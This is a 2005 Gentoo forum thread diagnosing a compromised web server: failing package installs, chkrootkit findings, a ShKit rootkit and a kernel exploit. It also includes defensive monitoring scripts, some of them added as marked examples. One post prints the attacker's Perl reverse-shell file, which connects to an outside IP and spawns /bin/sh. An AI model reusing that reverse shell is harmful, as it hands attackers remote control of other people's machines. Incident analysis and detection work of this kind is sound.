cato` Guru
Joined: 03 Jun 2002 Posts: 430 Location: Norway, Trondheim
Posted: Thu Apr 14, 2005 10:22 am Post subject: Portage: Failed to move ... [solved, compromised box]
I have a problem: every time I try to emerge something, this happens:
Code:
sbin/ipmaddr
sbin/iptunnel
sbin/mii-tool
bin/hostname
bin/netstat
usr/sbin/ether-wake
>>> Completed installing net-tools-1.60-r11 into /var/tmp/portage/net-tools-1.60-r11/image/
>>> Merging sys-apps/net-tools-1.60-r11 to /
-- /sbin/
>>> /sbin/arp
!!! Failed to move /var/tmp/portage/net-tools-1.60-r11/image/sbin/ifconfig to /sbin/ifconfig
!!! [Errno 1] Operation not permitted
This was with net-tools, but it also happens with coreutils.
I've managed to emerge portage, but that didn't solve it.
Is this a known problem? Can someone help me?
_________________
Don't mess with the Penguin.
Last edited by cato` on Thu Apr 14, 2005 12:34 pm; edited 1 time in total
hds Advocate
Joined: 21 Aug 2004 Posts: 2629 Location: Sprockhoevel [GER]
Posted: Thu Apr 14, 2005 10:48 am
Is /var/tmp/portage (or /var, /var/tmp) a symlink by any chance? If so, that doesn't work.
cato` Guru
Joined: 03 Jun 2002 Posts: 430 Location: Norway, Trondheim
Posted: Thu Apr 14, 2005 10:59 am
hds wrote:
> Is /var/tmp/portage (or /var, /var/tmp) a symlink by any chance? If so, that doesn't work.
No, it is not. I even deleted /var/tmp/portage, but the same error occurs.
The thing I don't understand is why some packages get installed (portage) and some do not.
I'm using portage-2.0.51.19 BTW.
_________________
Don't mess with the Penguin.
hds Advocate
Joined: 21 Aug 2004 Posts: 2629 Location: Sprockhoevel [GER]
cato` Guru
Joined: 03 Jun 2002 Posts: 430 Location: Norway, Trondheim
Posted: Thu Apr 14, 2005 11:40 am
That's the exact same problem I have, except automake works fine and my .m4 works.
emerge metadata does not solve it.
dmesg does not show any problems with my hard drives.
Checking for bad blocks will take some time ...
_________________
Don't mess with the Penguin.
hds Advocate
Joined: 21 Aug 2004 Posts: 2629 Location: Sprockhoevel [GER]
Posted: Thu Apr 14, 2005 11:49 am
BTW, you do this as root? It could really be a permission problem if you do this as a user, even if you are in group portage.
Hmm, OTOH portage itself wouldn't install either then.
cato` Guru
Joined: 03 Jun 2002 Posts: 430 Location: Norway, Trondheim
Posted: Thu Apr 14, 2005 11:59 am
I do this as root.
Code:
# badblocks -v /dev/hda
Checking blocks 0 to 8257032
Checking for bad blocks (read-only test): done
Pass completed, 0 bad blocks found.
So I'm kinda lost ... I'll post a bug report later today if someone/I can't figure out the problem.
_________________
Don't mess with the Penguin.
hds Advocate
Joined: 21 Aug 2004 Posts: 2629 Location: Sprockhoevel [GER]
Posted: Thu Apr 14, 2005 12:16 pm
Well, just checked: using the same version of portage as you are, and everything works fine here.
Really strange.
Put a test file in /var/tmp/portage and mv it from the command line to /sbin. Does that work?
Or simply do "mv /var/tmp/portage/net-tools-1.60-r11/image/sbin/ifconfig /sbin/ifconfig"
if you still have the temp files.
cato` Guru
Joined: 03 Jun 2002 Posts: 430 Location: Norway, Trondheim
Posted: Thu Apr 14, 2005 12:21 pm
hds wrote:
> Well, just checked: using the same version of portage as you are, and everything works fine here.
> Really strange.
> Put a test file in /var/tmp/portage and mv it from the command line to /sbin. Does that work?
> Or simply do "mv /var/tmp/portage/net-tools-1.60-r11/image/sbin/ifconfig /sbin/ifconfig"
> if you still have the temp files.
We found something ...
Code:
portage # mv /var/tmp/portage/net-tools-1.60-r11/image/sbin/ifconfig /sbin/ifconfig
mv: overwrite `/sbin/ifconfig', overriding mode 0755? y
mv: cannot move `/var/tmp/portage/net-tools-1.60-r11/image/sbin/ifconfig' to `/sbin/ifconfig': Operation not permitted
But what does that mean?
_________________
Don't mess with the Penguin.
cato` Guru
Joined: 03 Jun 2002 Posts: 430 Location: Norway, Trondheim
Posted: Thu Apr 14, 2005 12:24 pm
OK ... ran chkrootkit and it says ...
Code:
Checking `ifconfig'... INFECTED
Checking `inetd'... not tested
Checking `inetdconf'... not found
Checking `identd'... not infected
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... not infected
Checking `login'... INFECTED
Guess that's the problem.
_________________
Don't mess with the Penguin.
hds Advocate
Joined: 21 Aug 2004 Posts: 2629 Location: Sprockhoevel [GER]
Posted: Thu Apr 14, 2005 12:27 pm
sh*t
If you figure it out, please post what infected your system.
cato` Guru
Joined: 03 Jun 2002 Posts: 430 Location: Norway, Trondheim
Posted: Thu Apr 14, 2005 12:46 pm
It's a Romanian rootkit that was installed. In /tmp I have a file called "vechi", a file called "brk" and a file called w00t by the apache user.
The w00t file:
Code:
tmp # cat w00t
#!/usr/bin/perl
use Socket; use IO::Handle; use POSIX; $proto = getprotobyname('tcp'); socket(Socket_Handle, AF_INET, SOCK_STREAM, $proto); $sin = sockaddr_in(50 ,inet_aton("XXX.XXX.XXX.XXX" )); connect(Socket_Handle,$sin); dup2(Socket_Handle->fileno, 0); dup2(Socket_Handle->fileno, 1); dup2(Socket_Handle->fileno, 2); exec { "/bin/sh" } "";
(edited my IP away)
chkrootkit says I have the ShKit rootkit installed, and Checking `lkm'... You have 4 process hidden for ps command, Possible LKM Trojan installed.
My apache user runs something called "uselib24", that's a kernel 2.4 exploit. The kernel on the machine is 2.4.28.
My root user also runs something I dunno what it is:
root 1130 0.0 0.0 0 0 ? SW Mar30 0:00 [msp3410 [auto]]
_________________
Don't mess with the Penguin.
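As an added example (not from this thread and not chkrootkit's own code), here is the check behind chkrootkit's "process hidden for ps command" message written from scratch: enumerate process IDs from /proc and compare them with the PIDs that ps reports. A PID that exists in /proc but is absent from ps is what a ps-hiding rootkit leaves behind. The function names are mine; `hidden_pids` works on two PID lists so it can be checked against constructed input, and `live_hidden_pids` runs the same comparison on the running system.

```shell
#!/bin/sh
# Added example: compare process IDs visible in /proc against those ps reports.
# This is the idea behind chkrootkit's hidden-process check, reimplemented
# here; it is not chkrootkit's code.

# hidden_pids PROC_LIST PS_LIST
#   Both files hold one PID per line. Prints, in numeric order, every PID that
#   appears in PROC_LIST but not in PS_LIST.
hidden_pids() {
    tmp_proc=$(mktemp) || return 1
    tmp_ps=$(mktemp) || return 1
    # comm(1) needs both inputs in the same (lexical) order; sort -u also
    # drops duplicates so a PID listed twice cannot mask a missing one.
    sort -u "$1" > "$tmp_proc"
    sort -u "$2" > "$tmp_ps"
    comm -23 "$tmp_proc" "$tmp_ps" | sort -n
    rm -f "$tmp_proc" "$tmp_ps"
}

# live_hidden_pids
#   Take both snapshots from the running system and diff them. A process that
#   starts or exits between the two snapshots shows up as a false positive, so
#   a non-empty result should be confirmed with a second run and by looking at
#   /proc/PID/cmdline and /proc/PID/exe for each reported PID.
live_hidden_pids() {
    snap_proc=$(mktemp) || return 1
    snap_ps=$(mktemp) || return 1
    # Only purely numeric entries under /proc are processes.
    ls /proc | grep '^[0-9][0-9]*$' > "$snap_proc"
    # ps -e lists every process; -o pid= prints the PID column with no header.
    ps -e -o pid= | tr -d ' ' > "$snap_ps"
    hidden_pids "$snap_proc" "$snap_ps"
    rm -f "$snap_proc" "$snap_ps"
}

# Usage: source this file, then run live_hidden_pids. No output means /proc
# and ps agree.
```

The comparison trusts /proc; a kernel-level (LKM) rootkit that also filters /proc directory listings will not be caught this way, which is why chkrootkit's verdict reads "possible" and why a hit on a box like the one above is a reason to reinstall rather than to clean.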
hds Advocate
Joined: 21 Aug 2004 Posts: 2629 Location: Sprockhoevel [GER]
Posted: Thu Apr 14, 2005 1:00 pm
I wonder how this stuff got installed. Is this a webserver?
cato` Guru
Joined: 03 Jun 2002 Posts: 430 Location: Norway, Trondheim
Posted: Thu Apr 14, 2005 1:02 pm
Okay, the last one is something coldplug fires up on boot for the bttv card.
The w00t file launches a shell on port 50.
A Korean IP (218.48.78.XXX) is connected to the box.
Guess it's going down now. Damn script-kiddies.
_________________
Don't mess with the Penguin.
cato` Guru
Joined: 03 Jun 2002 Posts: 430 Location: Norway, Trondheim
Posted: Thu Apr 14, 2005 1:03 pm
hds wrote:
> I wonder how this stuff got installed. Is this a webserver?
Yes. My guess is that this is/was a PHP vulnerability.
_________________
Don't mess with the Penguin.
hds Advocate
Joined: 21 Aug 2004 Posts: 2629 Location: Sprockhoevel [GER]
Posted: Thu Apr 14, 2005 1:15 pm
cato` wrote:
> A Korean IP (218.48.78.XXX) is connected to the box.
Probably this system is compromised as well. Do a whois lookup. If it's a static IP (no provider or whatever) I would write an email to the webmaster.
OTOH, it could also be just a Windows client.
//edit: anyway, just wondering why you couldn't simply overwrite /sbin/ifconfig.
Did the file have special permissions?
Just curious; root should be able to overwrite any file, I thought.
btw2: I have esync, glsa-check and chkrootkit running every morning on my root server, and the results are posted to me via email. Perhaps you should do the same.
btw3: would be nice if a mod could move this to "Network & Security".
cato` Guru
Joined: 03 Jun 2002 Posts: 430 Location: Norway, Trondheim
Posted: Thu Apr 14, 2005 1:41 pm
Could you tell how to set up the glsa-check and how you mail the results to yourself?
_________________
Don't mess with the Penguin.
Maedhros Bodhisattva
Joined: 14 Apr 2004 Posts: 5511 Location: Durham, UK
Posted: Thu Apr 14, 2005 1:44 pm
Moved from Portage & Programming.
_________________
No-one's more important than the earthworm.
hds Advocate
Joined: 21 Aug 2004 Posts: 2629 Location: Sprockhoevel [GER]
Posted: Thu Apr 14, 2005 1:51 pm
cato` wrote:
> Could you tell how to set up the glsa-check and how you mail the results to yourself?
emerge gentoolkit
emerge sendEmail
bash script:
Code:
date >/root/status.txt
echo "-------------------------------">>/root/status.txt
esync -n -s >>/root/status.txt
echo "-------------------------------">>/root/status.txt
glsa-check -t all >>/root/status.txt
echo "-------------------------------">>/root/status.txt
chkrootkit >>/root/status.txt
echo "-------------------------------">>/root/status.txt
emerge -upDv --newuse world >>/root/status.txt
echo "-------------------------------">>/root/status.txt
df /dev/hda3 >>/root/status.txt
echo "-------------------------------">>/root/status.txt
sendEmail -t root -f root -m Status_Report -u System_Status -a /root/status.txt
Edit to your needs and put it in your crontab.
HTH
//edit: if you don't use esync, simply use "emerge sync", of course.
glsa-check belongs to gentoolkit.
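An added example, not hds's script above and not part of gentoolkit, chkrootkit or sendEmail: the same nightly report, with two changes a practitioner wants. Each check is written as a section that records the command's exit status instead of failing silently (a check that did not run is not a check that found nothing), and the report is scanned for chkrootkit's INFECTED lines so the mail subject says at a glance whether the scan hit. It assumes the tools from the post (glsa-check from gentoolkit, chkrootkit, sendEmail) are installed; the REPORT path, the MAILTO recipient, the `--run` guard and all function names are my own choices.

```shell
#!/bin/sh
# Added example: nightly status report in the spirit of the script above.
# Assumes gentoolkit (glsa-check), chkrootkit and sendEmail are installed.
# REPORT and MAILTO are assumptions; override them from the environment.

REPORT=${REPORT:-/root/status.txt}
MAILTO=${MAILTO:-root}

# section TITLE CMD [ARGS...]
#   Append a labelled section with CMD's output (stdout and stderr) to REPORT.
#   A failing command is noted in the report rather than ignored.
section() {
    title=$1; shift
    echo "------------------------------- $title" >> "$REPORT"
    rc=0
    "$@" >> "$REPORT" 2>&1 || rc=$?
    [ "$rc" -eq 0 ] || echo "!!! '$*' exited with status $rc" >> "$REPORT"
}

# count_infected FILE
#   Number of lines containing INFECTED. chkrootkit prints its positive
#   verdict in upper case; the "not infected" verdicts are lower case and
#   therefore do not match. A missing file counts as zero.
count_infected() {
    n=$(grep -c 'INFECTED' "$1" 2>/dev/null) || n=${n:-0}
    echo "$n"
}

# report_subject FILE
#   Mail subject derived from the report, so an alert is visible in the
#   inbox without opening the attachment.
report_subject() {
    n=$(count_infected "$1")
    if [ "$n" -gt 0 ]; then
        echo "ALERT: chkrootkit reports $n INFECTED entries"
    else
        echo "System status: no rootkit signatures"
    fi
}

# build_report
#   Same checks as the posted script; "emerge --sync" stands in for esync.
build_report() {
    date > "$REPORT"
    section "portage tree sync"     emerge --sync
    section "security advisories"   glsa-check -t all
    section "chkrootkit"            chkrootkit
    section "pending updates"       emerge -upDv --newuse world
    section "disk usage"            df
}

# Run from cron as: /path/to/status-report.sh --run
if [ "${1:-}" = "--run" ]; then
    build_report
    sendEmail -t "$MAILTO" -f root \
        -u "$(report_subject "$REPORT")" \
        -m "Nightly status report attached" -a "$REPORT"
fi
```

One caveat that the thread itself illustrates: chkrootkit runs with the system's own ifconfig, ps and login, and on a box where those are already replaced its output is only as trustworthy as the binaries it calls, so a scan that suddenly starts reporting "not infected" for everything is as worth reading as one that reports INFECTED.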